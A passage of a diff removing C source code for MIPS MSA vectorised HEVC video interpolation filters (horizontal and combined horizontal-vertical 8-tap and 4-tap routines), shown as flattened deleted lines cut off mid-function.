DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - dst2 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - dst3 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - /* row 4 row 5 row 6 */ - VSHF_B4_SB(src4, src4, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - VSHF_B4_SB(src5, src5, mask0, mask1, mask2, mask3, - vec4, vec5, vec6, vec7); - VSHF_B4_SB(src6, src6, mask0, mask1, mask2, mask3, - vec8, vec9, vec10, vec11); - dst4 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst4, dst4, dst4, dst4); - dst5 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst5, dst5, dst5, dst5); - dst6 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, - dst6, dst6, dst6, dst6); - - for (loop_cnt = height; loop_cnt--;) { - src7 = LD_SB(src_tmp); - src7 = (v16i8) __msa_xori_b((v16u8) src7, 128); - src_tmp += src_stride; - - VSHF_B4_SB(src7, src7, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst7 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst7, dst7, dst7, dst7); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst7, dst6, dst76_r, dst76_l); - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst0_l = HEVC_FILT_8TAP(dst10_l, dst32_l, dst54_l, dst76_l, - filt_h0, filt_h1, filt_h2, filt_h3); - dst0_r >>= 6; - dst0_l >>= 6; - - dst0_r = (v4i32) __msa_pckev_h((v8i16) dst0_l, (v8i16) dst0_r); - ST_SW(dst0_r, dst_tmp); - dst_tmp += dst_stride; - - dst0 = dst1; - dst1 = dst2; - dst2 = dst3; - dst3 = dst4; - dst4 = dst5; - dst5 = dst6; - dst6 = dst7; - } - - src += 8; - dst += 8; - } -} - -static void hevc_hv_8t_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 8); -} - -static void hevc_hv_8t_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 mask0, mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 vec8, vec9, vec10, vec11, vec12, vec13, vec14, vec15; - v8i16 filt0, filt1, filt2, filt3, filt_h0, filt_h1, filt_h2, filt_h3; - v8i16 filter_vec, const_vec; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v8i16 dst30, dst41, dst52, dst63, dst66, dst97, dst108; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r, dst21_r, dst43_r; - v8i16 dst65_r, dst87_r, dst109_r, dst10_l, dst32_l, dst54_l, dst76_l; - v4i32 dst0_r, dst0_l, dst1_r, dst2_r, dst3_r; - - src -= ((3 * src_stride) + 3); - filter_vec = LD_SH(filter_x); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W4_SH(filter_vec, filt_h0, filt_h1, filt_h2, filt_h3); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - src_tmp = src; - dst_tmp = dst; - - LD_SB7(src_tmp, src_stride, src0, src1, src2, src3, src4, src5, src6); - src_tmp += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - /* row 0 row 1 row 2 row 3 */ - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, vec8, vec9, vec10, - vec11); - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, vec12, vec13, vec14, - vec15); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst0, dst0, - dst0, dst0); - dst1 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst1, dst1, - dst1, dst1); - dst2 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, dst2, - dst2, dst2, dst2); - dst3 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, dst3, - dst3, dst3, dst3); - - /* row 4 row 5 row 6 */ - VSHF_B4_SB(src4, src4, mask0, mask1, mask2, mask3, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src5, src5, mask0, mask1, mask2, mask3, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src6, src6, mask0, mask1, mask2, mask3, vec8, vec9, vec10, - vec11); - dst4 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst4, dst4, - dst4, dst4); - dst5 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst5, dst5, - dst5, dst5); - dst6 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, dst6, - dst6, dst6, dst6); - - for (loop_cnt = height; loop_cnt--;) { - src7 = LD_SB(src_tmp); - src7 = (v16i8) __msa_xori_b((v16u8) src7, 128); - src_tmp += src_stride; - - VSHF_B4_SB(src7, src7, mask0, mask1, mask2, mask3, vec0, vec1, vec2, - vec3); - dst7 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst7, - dst7, dst7, dst7); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst7, dst6, dst76_r, dst76_l); - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst0_l = HEVC_FILT_8TAP(dst10_l, dst32_l, dst54_l, dst76_l, filt_h0, - filt_h1, filt_h2, filt_h3); - dst0_r >>= 6; - dst0_l >>= 6; - - dst0_r = (v4i32) __msa_pckev_h((v8i16) dst0_l, (v8i16) dst0_r); - ST_SW(dst0_r, dst_tmp); - dst_tmp += dst_stride; - - dst0 = dst1; - dst1 = dst2; - dst2 = dst3; - dst3 = dst4; - dst4 = dst5; - dst5 = dst6; - dst6 = dst7; - } - - src += 8; - dst += 8; - - mask4 = LD_SB(ff_hevc_mask_arr + 16); - mask5 = mask4 + 2; - mask6 = mask4 + 4; - mask7 = mask4 + 6; - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B4_SB(src0, src3, mask4, mask5, mask6, mask7, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src4, mask4, mask5, mask6, mask7, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src5, mask4, mask5, mask6, mask7, vec8, vec9, vec10, - vec11); - VSHF_B4_SB(src3, src6, mask4, mask5, mask6, mask7, vec12, vec13, vec14, - vec15); - dst30 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst30, - dst30, dst30, dst30); - dst41 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst41, - dst41, dst41, dst41); - dst52 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, dst52, - dst52, dst52, dst52); - dst63 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, dst63, - dst63, dst63, dst63); - - ILVRL_H2_SH(dst41, dst30, dst10_r, dst43_r); - ILVRL_H2_SH(dst52, dst41, dst21_r, dst54_r); - ILVRL_H2_SH(dst63, dst52, dst32_r, dst65_r); - - dst66 = (v8i16) __msa_splati_d((v2i64) dst63, 1); - - for (loop_cnt = height >> 2; loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - - VSHF_B4_SB(src7, src9, mask4, mask5, mask6, mask7, vec0, vec1, vec2, - vec3); - VSHF_B4_SB(src8, src10, mask4, mask5, mask6, mask7, vec4, vec5, vec6, - vec7); - dst97 = const_vec; - dst108 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst97, - dst97, dst97, dst97); - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst108, - dst108, dst108, dst108); - - dst76_r = __msa_ilvr_h(dst97, dst66); - ILVRL_H2_SH(dst108, dst97, dst87_r, dst109_r); - dst66 = (v8i16) __msa_splati_d((v2i64) dst97, 1); - dst98_r = __msa_ilvr_h(dst66, dst108); - - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst1_r = HEVC_FILT_8TAP(dst21_r, dst43_r, dst65_r, dst87_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst2_r = HEVC_FILT_8TAP(dst32_r, dst54_r, dst76_r, dst98_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst3_r = HEVC_FILT_8TAP(dst43_r, dst65_r, dst87_r, dst109_r, filt_h0, - filt_h1, filt_h2, filt_h3); - SRA_4V(dst0_r, dst1_r, dst2_r, dst3_r, 6); - PCKEV_H2_SW(dst1_r, dst0_r, dst3_r, dst2_r, dst0_r, dst2_r); - ST_D4(dst0_r, dst2_r, 0, 1, 0, 1, dst, dst_stride); - dst += (4 * dst_stride); - - dst10_r = dst54_r; - dst32_r = dst76_r; - dst54_r = dst98_r; - dst21_r = dst65_r; - dst43_r = dst87_r; - dst65_r = dst109_r; - dst66 = (v8i16) __msa_splati_d((v2i64) dst108, 1); - } -} - -static void hevc_hv_8t_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 16); -} - -static void hevc_hv_8t_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 24); -} - -static void hevc_hv_8t_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 32); -} - -static void hevc_hv_8t_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 48); -} - -static void hevc_hv_8t_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 64); -} - -static void hevc_hz_4t_4x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v8i16 filt0, filt1; - v16i8 src0, src1; - v16i8 mask1, vec0, vec1; - v8i16 dst0; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB2(src, src_stride, src0, src1); - XORI_B2_128_SB(src0, src1); - - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - ST_D2(dst0, 0, 1, dst, dst_stride); -} - -static void hevc_hz_4t_4x4_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3; - v16i8 mask1, vec0, vec1; - v8i16 dst0, dst1; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src2, src3, src2, src3, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - ST_D4(dst0, dst1, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_hz_4t_4x8multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 mask1, vec0, vec1; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - VSHF_B2_SB(src2, src3, src2, src3, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - VSHF_B2_SB(src4, src5, src4, src5, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - VSHF_B2_SB(src6, src7, src6, src7, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_D8(dst0, dst1, dst2, dst3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - } -} - -static void hevc_hz_4t_4w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height) { - hevc_hz_4t_4x2_msa(src, src_stride, dst, dst_stride, filter); - } else if (4 == height) { - hevc_hz_4t_4x4_msa(src, src_stride, dst, dst_stride, filter); - } else if (0 == height % 8) { - hevc_hz_4t_4x8multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } -} - -static void hevc_hz_4t_6w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - uint64_t dst_val0, dst_val1, dst_val2, dst_val3; - uint32_t dst_val_int0, dst_val_int1, dst_val_int2, dst_val_int3; - v8i16 filt0, filt1, dst0, dst1, dst2, dst3; - v16i8 src0, src1, src2, src3; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = 2; loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - dst_val0 = __msa_copy_u_d((v2i64) dst0, 0); - dst_val1 = __msa_copy_u_d((v2i64) dst1, 0); - dst_val2 = __msa_copy_u_d((v2i64) dst2, 0); - dst_val3 = __msa_copy_u_d((v2i64) dst3, 0); - - dst_val_int0 = __msa_copy_u_w((v4i32) dst0, 2); - dst_val_int1 = __msa_copy_u_w((v4i32) dst1, 2); - dst_val_int2 = __msa_copy_u_w((v4i32) dst2, 2); - dst_val_int3 = __msa_copy_u_w((v4i32) dst3, 2); - - SD(dst_val0, dst); - SW(dst_val_int0, dst + 4); - dst += dst_stride; - SD(dst_val1, dst); - SW(dst_val_int1, dst + 4); - dst += dst_stride; - SD(dst_val2, dst); - SW(dst_val_int2, dst + 4); - dst += dst_stride; - SD(dst_val3, dst); - SW(dst_val_int3, dst + 4); - dst += dst_stride; - } -} - -static void hevc_hz_4t_8x2multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1, dst0, dst1; - v16i8 src0, src1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB2(src, src_stride, src0, src1); - src += (2 * src_stride); - - XORI_B2_128_SB(src0, src1); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - ST_SH2(dst0, dst1, dst, dst_stride); - dst += (2 * dst_stride); - } -} - -static void hevc_hz_4t_8x4multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_4t_8w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height || 6 == height) { - hevc_hz_4t_8x2multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } else { - hevc_hz_4t_8x4multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } -} - -static void hevc_hz_4t_12w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3; - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - v16i8 mask3; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask2 = { - 8, 9, 9, 10, 10, 11, 11, 12, 24, 25, 25, 26, 26, 27, 27, 28 - }; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - mask3 = mask2 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - VSHF_B2_SB(src0, src1, src0, src1, mask2, mask3, vec0, vec1); - dst4 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst4, dst4); - VSHF_B2_SB(src2, src3, src2, src3, mask2, mask3, vec0, vec1); - dst5 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst5, dst5); - - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - ST_D4(dst4, dst5, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_4t_16w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v16i8 src4, src5, src6, src7; - v8i16 filt0, filt1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v16i8 vec0, vec1; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src2, src4, src6); - LD_SB4(src + 8, src_stride, src1, src3, src5, src7); - src += (4 * src_stride); - - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec0, vec1); - dst4 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst4, dst4); - - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec0, vec1); - dst5 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst5, dst5); - - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec0, vec1); - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst6, dst6); - - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec0, vec1); - dst7 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst7, dst7); - - ST_SH4(dst0, dst2, dst4, dst6, dst, dst_stride); - ST_SH4(dst1, dst3, dst5, dst7, dst + 8, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_4t_24w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - int16_t *dst_tmp = dst + 16; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 filt0, filt1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1, mask00, mask11; - v16i8 vec0, vec1; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - mask00 = mask0 + 8; - mask11 = mask0 + 10; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - /* 16 width */ - LD_SB4(src, src_stride, src0, src2, src4, src6); - LD_SB4(src + 16, src_stride, src1, src3, src5, src7); - src += (4 * src_stride); - - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src0, src1, src0, src1, mask00, mask11, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src2, src3, src2, src3, mask00, mask11, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH2(dst0, dst1, dst, 8); - dst += dst_stride; - ST_SH2(dst2, dst3, dst, 8); - dst += dst_stride; - - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src4, src5, src4, src5, mask00, mask11, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec0, 